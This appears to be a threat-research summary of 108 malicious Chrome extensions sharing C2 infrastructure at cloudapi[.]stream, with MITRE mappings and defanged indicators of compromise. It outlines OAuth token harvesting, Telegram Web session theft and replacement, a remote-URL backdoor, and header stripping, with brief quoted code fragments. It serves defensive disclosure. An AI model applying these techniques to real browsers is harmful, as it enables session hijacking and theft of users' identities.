Threat Research

108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure

SocketDev
108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure
Socket’s Threat Research Team discovered 108 malicious Chrome extensions that share a single C2 infrastructure at cloudapi[.]stream and collectively account for about 20k installs under five publisher identities, exfiltrating Google identities, Telegram Web sessions, browsing data, and opening attacker-specified URLs. The campaign includes OAuth-based identity harvesting, a Telegram Web session stealer (Telegram Multi-account) that exfiltrates sessions every 15 seconds, a universal loadInfo() backdoor, and header-stripping declarativeNetRequest rules used to inject ads and bypass protections; #TelegramMultiAccount #cloudapi_stream

Keypoints

  • 108 malicious Chrome extensions across five publisher names (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt) share a unified backend at cloudapi[.]stream and total ~20k installs.
  • 54 extensions harvest Google account identity via chrome.identity.getAuthToken and POST profile data to mines[.]cloudapi[.]stream/auth_google, capturing persistent “sub” identifiers.
  • Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) actively exfiltrates Telegram Web sessions every 15 seconds to tg[.]cloudapi[.]stream/save_session.php and supports remote session replacement for full account takeover.
  • 45 extensions contain an identical loadInfo() backdoor that POSTs the extension ID to mines[.]cloudapi[.]stream/user_info on browser startup and opens server-supplied infoURL, allowing silent remote URL execution.
  • Five extensions use declarativeNetRequest rules to strip CSP/X-Frame-Options/CORS headers and spoof User-Agent/Origin/Referer to enable session theft and ad/content injection on targeted sites (Telegram, YouTube, TikTok).
  • The infrastructure and monetization (topup[.]cloudapi[.]stream, shared OAuth client IDs from two Google Cloud projects) indicate a Malware-as-a-Service model with centralized operator control and shared OAuth credentials.

MITRE Techniques

  • [T1176 ] Browser Extensions – Malicious Chrome extensions were used to deliver functionality and hidden malicious behavior across users’ browsers ( ‘108 malicious Chrome extensions operating as a coordinated campaign’ )
  • [T1539 ] Steal Web Session Cookie – The Telegram extension serializes localStorage to extract the Telegram Web user_auth token and exfiltrates it ( ‘it immediately calls getSessionDataJson(), which serializes the page’s entire localStorage and extracts the user_auth token’ )
  • [T1528 ] Steal Application Access Token – Extensions acquire Google OAuth2 tokens via chrome.identity.getAuthToken and use them to obtain profile data ( ‘chrome.identity.getAuthToken({ interactive: true }) acquires a Google OAuth2 Bearer token’ )
  • [T1041 ] Exfiltration Over C2 Channel – Stolen sessions and identity records are POSTed to attacker-controlled endpoints on cloudapi[.]stream ( ‘POSTs the data to the C2: https://tg[.]cloudapi[.]stream/save_session.php’ )
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Command-and-control and data exfiltration occur over HTTP(S) endpoints such as /user_info and /save_session.php ( ‘POST to /user_info on service worker startup with the extension ID’ )
  • [T1027 ] Obfuscated Files or Information – Operators injected or modified extension code; injected functions differ stylistically from surrounding minified code indicating post-hoc backdoor insertion ( ‘function was stylistically inconsistent with the surrounding minified code’ )
  • [T1185 ] Browser Session Hijacking – The extension supports remote replacement of a victim’s Telegram session by clearing localStorage and writing attacker-supplied session data ( ‘it clears the victim’s localStorage, overwrites it with threat actor-supplied session data, and force-reloads Telegram.’ )

Indicators of Compromise

  • [Email addresses ] Contact/author and support addresses observed in bundled files and listings – kiev3381917@gmail[.]com, nadejdinv@gmail[.]com, and 5 more addresses
  • [Domains/Subdomains ] Centralized C2 and asset hosts used by the campaign – cloudapi[.]stream, mines[.]cloudapi[.]stream, and other subdomains (tg., topup., cdn., multiaccount., api., gamewss.)
  • [IP Address ] Host for shared backend (Contabo VPS) – 144[.]126[.]135[.]238
  • [Chrome Extension IDs ] Malicious extension identifiers published in the Chrome Web Store – obifanppcpchlehkjipahhphbcbjekfa (Telegram Multi-account), ogogpebnagniggbnkbpjioobomdbmdcj (Text Translation), and 106 more extension IDs
  • [Google Cloud Project IDs ] OAuth client roots tying extensions to a single operator – 1096126762051, 170835003632
  • [C2 Endpoints/URLs ] Exfiltration and command API endpoints observed in extension code – tg[.]cloudapi[.]stream/save_session.php, mines[.]cloudapi[.]stream/auth_google, and additional endpoints such as /user_info, /count_sessions.php, /get_sessions.php

Read more: https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-shared-c2